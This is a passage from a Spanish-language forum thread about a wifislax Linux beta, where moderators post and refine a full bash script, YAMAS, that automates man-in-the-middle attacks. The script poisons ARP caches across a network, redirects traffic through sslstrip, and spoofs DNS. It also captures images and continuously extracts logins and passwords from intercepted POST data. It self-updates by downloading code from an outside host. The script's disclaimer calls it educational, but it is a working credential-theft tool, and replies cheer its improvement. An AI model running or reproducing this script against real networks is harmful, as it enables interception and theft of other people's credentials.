egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
  }
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.[/spoiler]
« Última modificación: 28-07-2012, 05:35 (Sábado) por USUARIONUEVO »

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #54 en: 28-07-2012, 05:37 (Sábado) »
mm, yo comiendome la cabeza, y ademas resulta que driftnet cuando acaba limpia el directorio /tmp  , o el script lleva la orden en algun sitio  >:(

asi que ya esta.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #55 en: 28-07-2012, 05:45 (Sábado) »
bueno , me quedare con el tuyo , pero con tu permiso le modificare 1 linea.

cuando creamos la ruta de captura..nos crea la carpeta con la fecha...con lo que al final en root tendremos un monton de carpetas.

asi que le añadi

/driftnet

y dentro crea las carpetas con fecha y sus capturas..asi estaran ordenadas dentro de su capeta y no danzando por la raiz.

linea 453

donde antes

 1) mkdir $log_output_dir/capture_$(date +%d%m%y).....

despues

 1) mkdir $log_output_dir/Driftnet/capture_$(date +%d%m%y)....

me quedo con el tuyo que esta un poco mas aseado , ya que solo crea carpetas de captura cuando se lanza driftnet y no antes, el mio creaba las rutas sistematicamente aunque no ejecutaramos driftnet.


buen trabajo tio,.   >:( >:( >:( >:( >:(
« Última modificación: 28-07-2012, 05:48 (Sábado) por USUARIONUEVO »

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2383
  • Prácticas precisas precisan práctica
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #56 en: 28-07-2012, 05:59 (Sábado) »
bueno , me quedare con el tuyo , pero con tu permiso le modificare 1 linea.

cuando creamos la ruta de captura..nos crea la carpeta con la fecha...con lo que al final en root tendremos un monton de carpetas.

asi que le añadi

/driftnet

y dentro crea las carpetas con fecha y sus capturas..asi estaran ordenadas dentro de su capeta y no danzando por la raiz.

linea 453

donde antes

 1) mkdir $log_output_dir/capture_$(date +%d%m%y).....

despues

 1) mkdir $log_output_dir/Driftnet/capture_$(date +%d%m%y)....

me quedo con el tuyo que esta un poco mas aseado , ya que solo crea carpetas de captura cuando se lanza driftnet y no antes, el mio creaba las rutas sistematicamente aunque no ejecutaramos driftnet.


buen trabajo tio,.   >:( >:( >:( >:( >:(

Perfect  ;)

Al final hemos mejorado bastante el script original, somos unos maquinas  ;D

esto es trabajo en equipo y lo demas son tonterias  >:( >:( >:( >:( >:(

La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #57 en: 28-07-2012, 06:12 (Sábado) »
al final me toco en el parametro de captura, espeficicar

/root/Driftnet

asi al hacer mkdir , se genera , y dentro la carpeta con fecha.

pd: al mkdir le añadi la opcion -p  para que aunque exista el directorio , lo genere igualmente por que si no , no se captura,...y aunque regenere un directorio existente, el contenido no se pierde.

he hecho varias pruebas..en varias sesiones y esta todo perfect.

parecemos chimo bayo..esta si esta no.... >:D >:D >:D >:D >:D

code final.
[spoiler]
# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX
# Modified by www.seguridadwireless.net

if [ $UID -ne 0 ]; then
    echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
    sleep 3
    fi

log_output_dir=/root/Driftnet
sslstrip_dir=
ask_for_install=n

if [ ! -d "$log_output_dir" ]; then
    mkdir -p $log_output_dir
fi

version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
   kill $looparseid
fi

if [[ $sslstripid != "" ]];then
   kill $sslstripid
fi

if [[ $dnsid != "" ]];then
   kill $dnsid
fi

if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi

if [[ "$etter" = "1" ]];then
   killall ettercap
else
   killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush          # there are probably too many resets here,
iptables --table nat --flush      # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
   rm /tmp/looparse.sh
fi

echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}

#Let's define some arguments that can be passed to the script :

#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
   -p | --parse)
      if [[ $2 == "" ]]; then
         echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
         exit 0
      fi
clear
   echo -e "Parsing $2 for credentials.\n\n"
   cat $2 |
   awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
   awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
   egrep -i -a -f /tmp/grepcred.txt |
   awk -F "=" '{if (length($2) < 4) print "";
   else if ($1 ~/Website/) print $0;
   else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
   else print "Login = \t"$2}' |
   uniq
   exit 0 ;;
  
   -e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
   etter="1"
   shift
   sleep 0.5 ;;

   -h | --help) clear
   echo -e "You are running $0, version $version.


usage : $0 -h -c -p -e -s -f
   -h or --help  :   Display this help message, disclaimer and exit.
   -c or --change: Display changelog and todo.  
   -e :   Use ettercap instead of ARPspoof. One might have one's reasons...
         ARPspoof is default.
   -p or --parse :   Only parse the given <file>. Don't use wildcards.
         Use > /output_file to print to a file.
   -s : The script won't download anything. Make sure you have the needed files.
   -f : Use a padlock favicon in sslstrip.
  
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;

   -c | --change)
   clear
   echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help

\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features

\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.

Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
   exit ;;

   -s | --silent)
   echo "silent mode ON"
   silent="1"
   shift ;;

   -f | --fav)
   echo "favicon mode ON"
   fav="-f"
   shift ;;

   *) shift ;;
esac

done

### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
   message="\nNo message to display : you are running in silent mode"
else
   message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi

if [[ $1 = "-s" || $2 = "-s" ]]; then
   echo "ASCII tables won't be available."
   echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
   wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi

### Check for updates !
if [[ "$silent" = "1" ]];then
   echo "Not checking for a new version : silent mode."
else
   changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
   last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
   if [[ $last_version > $version ]];then # Comparing to current version
      echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
      read update
      if [[ $update = Y || $update = y ]];then
         echo "

    Updating script..."

         wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
         chmod +x $0
         echo "[-] Script updated !"
         if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
            echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
            read install
            if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
               cp $0 /usr/bin/yamas
               chmod +x /usr/bin/yamas
               echo "Script should now be installed, launching yamas !"
               sleep 3
               yamas
               exit 1
            else
               echo "Ok, continuing with updated version..."
               sleep 3
               $0
               exit 1
            fi
         fi
      
      sleep 2
      $0
      exit 1
      else
         echo "Ok, continuing with current version..."
      fi
   else
      echo "No update available"
   fi
fi
### End of update process

### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
   echo "Script is not installed. Do you want to install it ? (Y/N)"
   read install
   if [[ $install = Y || $install = y ]] ; then
      cp -v $0 /usr/bin/yamas
      chmod +x /usr/bin/yamas
      rm $0
      echo "Script should now be installed. Launching it !"
      sleep 3
      yamas
      exit 1
   else
      echo "Ok, not installing then !"
   fi
else
   echo "Script is installed"
   sleep 1
fi
### End of install process

clear
echo -e "
                                                              
     \`YMM'   \`MM'   db      \`7MMM.     ,MMF'      db       .M\"\"\"bgd
       VMA   ,V    ;MM:       MMMb    dPMM       ;MM:     ,MI    \"Y
        VMA ,V    ,V^MM.      M YM   ,M MM      ,V^MM.    \`MMb.    
         VMMP    ,M  \`MM      M  Mb  M' MM     ,M  \`MM      \`YMMNq.
          MM     AbmmmqMA     M  YM.P'  MM     AbmmmqMA   .     \`MM
          MM    A'     VML    M  \`YM'   MM    A'     VML  Mb     dM
        .JMML..AMA.   .AMMA..JML. \`'  .JMML..AMA.   .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m     Welcome to Yet Another MITM Automation Script.\033[m                      =
=\033[31m     Use this tool responsibly, and enjoy!\033[m                               =
=     Feel free to contribute and distribute this script as you please.   =
=     Official thread : http://tinyurl.com/yamas-bt5                      =
=     Check out the help (-h) to see new features and informations        =
=     You are running version \033[32m$version\033[m                                    =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo

# Starting fresh : reset IP forward and iptables
echo -e "\033[31mCleaning iptables \033[m"

echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."

# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31mKilling processes and resetting iptable.\033[m"

kill $sslstripid
kill $looparseid

if [[ $drifton = 1 ]]; #if driftnet was used
      then
     killall driftnet && killall driftnet #kill the unbeliever
fi

if [[ "$etter" = "1" ]];then
   killall ettercap
else
   killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush          # there are probably too many resets here,
iptables --table nat --flush      # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
   cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
   if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
      echo "Log file copied !" #it does
      else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
   fi
else
   echo "Logs not saved"
fi

echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
   cat /tmp/$filename.txt |
   awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
   awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
   egrep -i -a -f /tmp/grepcred.txt |
   awk -F "=" '{if (length($2) < 4) print "";
   else if ($1 ~/Website/) print $0;
   else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
   else print "Login = \t"$2}' |
   uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
   if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
      echo "Passwords saved !" #it does
   else
      echo "Error while saving passwords" #it does not
   fi
else
   echo "Password saving skipped."
fi

rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
   echo -e "\n\n"
   exit 1 #if yes, exit.
else
   echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
   read -e install
      case $install in
      Y | y | yes)
         cp $0 /usr/bin/yamas #copy and rename script
         echo -e "\033[32m Script installed !\033[m" ;;
      *) echo "Script not installed." ;;
      esac
fi

exit 1
}

search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.

rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}

add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}

ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}

dns_spoof()
{

### Make Host function###
   mkhst()
   {
   echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
   rm ~/hosts_spoof
   while :
   do
      read input
      echo "$input" >> ~/hosts_spoof
      if [[ $input == "#" ]];then
         break
      fi
   done
   }

###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
   echo "Host file $gothost will be used."
else
   echo -e "We'll make one...\n"
   mkhst
fi

xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}

choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
   E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
   ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
  
   D) echo "We'll use dnsspoof."
   dns_spoof ;;

   a | A) final ;;

   *) echo "Wrong choice. Please use E or D"
   choose_dns;;
esac

final
}

misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
   1) mkdir -p $log_output_dir/capture_$(date +%d%m%y) && driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y)  > /dev/null & driftnet -i $iface &> /dev/null &
      drifton=1 &
      echo "Driftnet launched, the images will be saved in $log_output_dir/capture_$(date +%d%m%y)"
      misc ;;
   2) choose_dns ;;
   3) final ;;
   *) echo "bad choice"
     misc ;;
esac
}

rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out?  It's singular options without a space, so I think the need for quotes is NOT needed??
   1) echo -e "\033[33mPausing...\033[m"

   kill -19 $looparseid
   echo -e "\033[33m[-]Paused.\033[m"
   rtparse;;

   2) echo -e "\033[33mResuming...\033[m"

   kill -18 $looparseid
   echo -e "\033[33m[-]Resumed.\033[m"
   rtparse;;

   3) echo -e "\033[31mKilling...\033[m"

   kill $looparseid
   echo -e "\033[33m[-]Killed.\033[m"
   rtparse;;

   4) echo -e "\033[32mLaunching...\033[m"

   xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
   sleep 2
   echo -e "\033[33m[-]Launched.\033[m"
   rtparse;;

   5) echo "Previous"
   final ;;

   *) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
   rtparse;;
esac
}

final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.

Enter the number of the desired option."
read final
case $final in
   1) rescan ;;

   2) add_target ;;

   3) ascii ;;

   4) rtparse ;;

   5) misc ;;

   6) cleanup ;;

   *) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
   final ;;
esac
}

###############################End of functions#############################

# IP forwarding
echo
echo -e "\033[31mActivating IP forwarding... \033[m"

echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

#Iptables
echo
echo -e "\033[31mConfiguring iptables... \033[m"

echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
   outport=8080
   echo -e "Port $outport selected as default.\n"
fi

echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
   inport=80
   echo -e "Port $inport selected as default.\n"
fi

echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Sslstrip
echo
echo -e "\033[31mActivating sslstrip... \033[m"

echo  "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
   filename="yamas"
fi

echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"

if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
   if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
      chmod +x $sslstrip_dir/sslstrip.py #make it executable
   fi
   $sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
   sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi

sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo

#Arpspoofing
echo
echo -e "\033[31m

    Activating ARP cache poisoning... \033[m"

echo
ip route show | awk '(NR == 1) { print "Gateway :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
   gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
   echo -e "$gateway selected as default.\n"
fi

echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
   iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
   echo -e "$iface selected as default.\n"
fi

echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
   echo -e "\nDo you want to map the network to show live hosts? (Y/N)   [This might take up to 30 secs, be patient]"
   read -e hosts
   echo -e "\033[31m "
   if [[ $hosts = "Y" || $hosts = "y" ]];then
      nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
      echo -e "\033[m " # switch color back to white
   else
      echo -e "\033[m "
   fi
   echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
   arpspoofi()
   { # We launch ARPspoof in different xterm windows to keep script running
   while [ "$1" != "" ];do
      xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
      shift
   done

   echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
   }

   ettercapi()
   { # We launch ARPspoof in different xterm windows to keep script running
   while [ "$1" != "" ];do
      xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp  /$gateway/ /$1/ 2>/dev/null & sleep 2
      shift
   done

   echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
   }

   read -e parameters
   if [[ "$etter" = "1" ]];then
      ettercapi $parameters
   else
      arpspoofi $parameters
   fi

else
   if [[ "$etter" = "1" ]];then
      xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp  // // &
      sleep 2
      echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
   else
      xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
      sleep 2
      echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
   fi
fi

echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
   clear
   echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
   cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
  }
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.
[/spoiler]
« Última modificación: 28-07-2012, 06:23 (Sábado) por USUARIONUEVO »

teik

  • Visitante
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #58 en: 28-07-2012, 11:30 (Sábado) »
No queria meterme en estos dialogos... jajaj!! Pero mis felicitaciones!! habeis cogido un script y lo habeis mejorado hasta este punto que es algo alucinante!! Usuarionuevo despues de la paliza que te acabas de dar y geminis_demon... yo creo que es necesario que subas la nueva beta que estoy deseando probar!!!

PD: Una aplicacion que no vi.... fue la de reaver gui!! yo la solia utilizar mucho... pero que sino crees que sea necesaria me aplico y me pongo manos con el reaver de comandos... que no pasa nada jaja!!

ñandu

  • Visitante
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #59 en: 28-07-2012, 12:41 (Sábado) »
si estos chavales con el esfuerso y las ganas que ponen en cada trabajo si estuvieran en las olimpiadas se llevarian todas las medallas ,pero para nuestra suerte esta entre nosotros y sin pedir nada a cambio ,seguid 100pre asi que son unos verdaderos crack  >:( >:( >:( >:( salu2